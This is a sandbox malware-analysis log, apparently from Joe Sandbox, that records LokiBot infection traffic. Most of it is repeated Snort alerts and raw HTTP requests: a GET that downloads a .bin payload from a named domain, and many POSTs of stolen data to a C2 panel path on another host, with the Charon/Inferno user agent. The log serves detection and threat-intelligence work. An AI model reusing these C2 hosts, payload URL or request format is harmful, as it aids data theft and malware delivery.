        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49938 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49938 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49939 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49939 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49939 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49939 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49940 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49940 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49940 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49940 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49941 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49941 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49941 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49941 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49942 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49942 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49942 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49942 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49943 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49943 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49943 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49943 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49944 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49944 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49944 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49944 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49948 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49948 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49948 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49948 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49949 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49949 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49949 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49949 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49950 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49950 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49950 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49950 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49951 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49951 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49951 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49951 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49952 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49952 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49952 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49952 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49953 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49953 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49953 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49953 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49954 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49954 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49954 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49954 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49955 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49955 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49955 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49955 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49956 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49956 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49956 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49956 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49957 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49957 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49957 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49957 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49958 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49958 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49958 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49958 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49959 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49959 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49959 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49959 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49960 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49960 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49960 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49960 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49961 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49961 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49961 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49961 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49962 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49962 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49962 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49962 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49964 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49964 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49964 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49964 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49965 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49965 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49965 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49965 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49966 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49966 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49966 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49966 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49967 -> 176.223.209.128:80
        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49967 -> 176.223.209.128:80
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: https://fabricraft.co.za/Farmant_hhVNwJna195.bin
        Source: Joe Sandbox ViewASN Name: ROHOSTWAY-ASRO ROHOSTWAY-ASRO
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Joe Sandbox ViewIP Address: 176.223.209.128 176.223.209.128
        Source: global trafficHTTP traffic detected: GET /Farmant_hhVNwJna195.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: fabricraft.co.zaCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 178Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 3206Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
        Source: global trafficHTTP traffic detected: POST /arman30/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: farmanat.roAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F45E6F10Content-Length: 151Connection: close
